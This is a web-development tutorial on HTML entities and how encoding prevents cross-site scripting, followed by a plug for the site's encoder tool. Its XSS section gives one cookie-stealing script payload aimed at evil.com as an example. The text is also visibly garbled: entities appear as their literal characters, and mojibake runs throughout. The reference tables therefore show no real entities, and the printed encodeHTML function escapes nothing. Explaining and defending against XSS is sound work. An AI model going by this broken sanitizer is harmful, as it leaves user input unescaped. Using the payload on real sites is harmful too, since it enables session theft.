HTML Entities Encoding Guide: Protect Your Web Pages
If you've ever tried to display a <div> tag as text on a web page and watched it vanish into the DOM instead, you already know the problem. Browsers treat certain characters as markup instructions, not content. HTML entities are how you tell the browser: "display this character literally, don't interpret it."
This guide covers the entities you'll actually use, when encoding matters, and how to avoid the security holes that come from skipping it.
Why HTML Entities Exist
HTML uses a handful of characters as structural delimiters. The big three:
<opens a tag>closes a tag&starts an entity reference
When the browser's parser hits <script>, it doesn't display the textâit executes JavaScript. When it hits ©, it renders Š. This dual-purpose nature means that if you want to display these characters as visible text, you need to escape them using HTML entities.
An HTML entity is a string that starts with & and ends with ;. Between those delimiters is either a named reference (like amp) or a numeric code point (like #38).
Common HTML Entities Reference
Here are the entities you'll reach for most often:
| Character | Named Entity | Numeric Entity | Description |
|---|---|---|---|
& | & | & | Ampersand |
< | < | < | Less than |
> | > | > | Greater than |
" | " | " | Double quote |
' | ' | ' | Single quote (apostrophe) |
| (space) | |   | Non-breaking space |
| Š | © | © | Copyright |
| â | — | — | Em dash |
| ⌠| … | … | Ellipsis |
| ⏠| € | € | Euro sign |
| ⢠| ™ | ™ | Trademark |
The first five are mandatory to know. If you're rendering any user-generated content or displaying code, you'll use &, <, >, ", and ' constantly.
Non-Breaking Space: The Subtle One
prevents a line break between two words. It's not just "an extra space"âbrowsers collapse multiple regular spaces into one, but always renders. Use it for:
- Keeping units with numbers:
100 km - Preventing orphan words at the end of paragraphs
- Formatting prices:
$ 99.99
Don't use for layout spacing. That's what CSS margin and padding are for.
Named vs Numeric vs Hex Entities
There are three ways to write the same entity:
<!-- Named entity -->
&
<!-- Decimal numeric entity -->
&
<!-- Hexadecimal numeric entity -->
&
All three produce the ampersand character &. Here's when to use each:
Named entities (&, <, ©) are readable and self-documenting. When someone reads your HTML source, & immediately communicates intent. Use these for common characters.
Decimal numeric entities (&, ©) work for any Unicode code point, even characters without named references. Use these when you need characters that don't have named entities, or when generating HTML programmatically.
Hex entities (&, ©) are the same as decimal but use hexadecimal notation. Useful when you're working with Unicode tables (which list code points in hex) or when your tools output hex values.
In practice, stick with named entities for the common ones and fall back to numeric for everything else. Named entities are supported across all browsers and are far easier to read in source code.
When to Encode HTML Characters
Displaying Code Snippets
If your page shows code examples, every < and > needs encoding:
<!-- This breaks -->
<p>Use the <div> tag for containers.</p>
<!-- This works -->
<p>Use the <div> tag for containers.</p>
Most template engines and frameworks handle this automatically when you use their standard output syntax (e.g., {{ variable }} in templating languages or {variable} in JSX). But when you're writing raw HTML or injecting content with innerHTML, you're on your own.
User-Generated Content
Any content that comes from usersâform inputs, comments, profile fields, search queriesâmust be encoded before rendering. This is a security requirement, not optional.
HTML Emails
Email clients are notoriously inconsistent with character rendering. Encoding special characters as entities ensures they display correctly across Gmail, Outlook, Apple Mail, and every other client. This is especially important for characters like &, ", and non-ASCII symbols.
Content Management Systems
If you're building a CMS or working with one, the content pipeline should encode HTML entities at the output stage. Content stored in the database might be raw, but what hits the browser must be escaped.
XSS Prevention: Why Encoding Is a Security Issue
Failing to encode user input before rendering it in HTML is the most common cause of Cross-Site Scripting (XSS) vulnerabilities. This isn't a theoretical riskâXSS is consistently in the OWASP Top 10 and is actively exploited.
How XSS Works
Consider a search page that displays what the user searched for:
<!-- Server renders this -->
<p>You searched for: USER_INPUT</p>
If a user enters normal text like javascript tutorials, no problem. But what if they enter:
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
Without encoding, the browser sees a real <script> tag and executes it. The attacker now has the victim's cookies, session tokens, and potentially full account access.
The Fix
Encode the five critical characters before inserting any untrusted data into HTML:
| Character | Entity | Why It Matters |
|---|---|---|
& | & | Prevents entity injection |
< | < | Prevents tag injection |
> | > | Closes injected tags |
" | " | Prevents attribute breakout |
' | ' | Prevents attribute breakout (single-quoted) |
Here's a minimal encoding function:
function encodeHTML(str) {
return str
.replace(/&/g, '&')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/"/g, '"')
.replace(/'/g, ''');
}
Note the order: & must be replaced first. If you replace < first (producing <), then replace & (turning < into &lt;), you get double-encoding.
Encoding alone doesn't cover all XSS contexts. If you're inserting user data into JavaScript, CSS, or URL attributes, you need context-specific encoding. HTML entity encoding only protects HTML body and attribute contexts.
Framework-Level Protection
Modern frameworks handle encoding by default:
- React: JSX automatically escapes values in
{}expressions. UsingdangerouslySetInnerHTMLbypasses thisâavoid it with user content. - Angular: Template bindings are sanitized automatically.
[innerHTML]bypasses sanitization. - Vue: Mustache syntax
{{ }}auto-escapes.v-htmldoes not. - Server-side templates (EJS, Jinja2, Twig): Most auto-escape by default, but check your configuration.
The pattern is consistent: the standard path is safe, and there's always an escape hatch for raw HTML. Never pass user input through the escape hatch.
Encode HTML with Our Tool
Need to quickly encode or decode HTML entities? Our HTML Encoder tool handles it instantly:
- Paste your text and get encoded output in one click
- Supports all named and numeric entities
- Decode entities back to readable text
- Everything processes client-sideâyour data never leaves your browser
It's particularly useful for preparing content for HTML emails, encoding code snippets for documentation, or sanitizing text before embedding it in templates.
Common Mistakes to Avoid
Double encoding: Running text through an encoder twice turns & into &amp;. If you see & showing up as literal text on your page, you've double-encoded somewhere in your pipeline.
Encoding inside <script> tags: HTML entity encoding doesn't work inside script blocks. The JavaScript parser doesn't understand <âit sees it as the literal string <. For inline scripts, use JavaScript string escaping instead.
Using for spacing: This creates accessibility issues. Screen readers may pronounce each non-breaking space individually. Use CSS for visual spacing.
Forgetting attribute values: Encoding isn't just for text content. Attribute values need encoding too, especially if they contain user input:
<!-- Dangerous -->
<input value="USER_INPUT">
<!-- Safe -->
<input value=""encoded" value">
Quick Reference: Encoding Decision Tree
- Is the content user-generated? â Always encode
- Are you displaying code? â Encode
<,>, and& - Is it going in an HTML attribute? â Encode
"and'too - Is it going in a URL? â Use URL encoding instead (see our URL Encoding Guide)
- Is it going in JavaScript? â Use JavaScript escaping, not HTML entities
Related Resources
- Base64 Encoding Explained â understand another essential encoding format for web development
- URL Encoding Guide â learn when and how to percent-encode characters in URLs
- HTML Encoder Tool â encode and decode HTML entities instantly in your browser
đ ď¸ Try our HTML Encoder to encode and decode HTML entities right in your browserâno data sent to any server.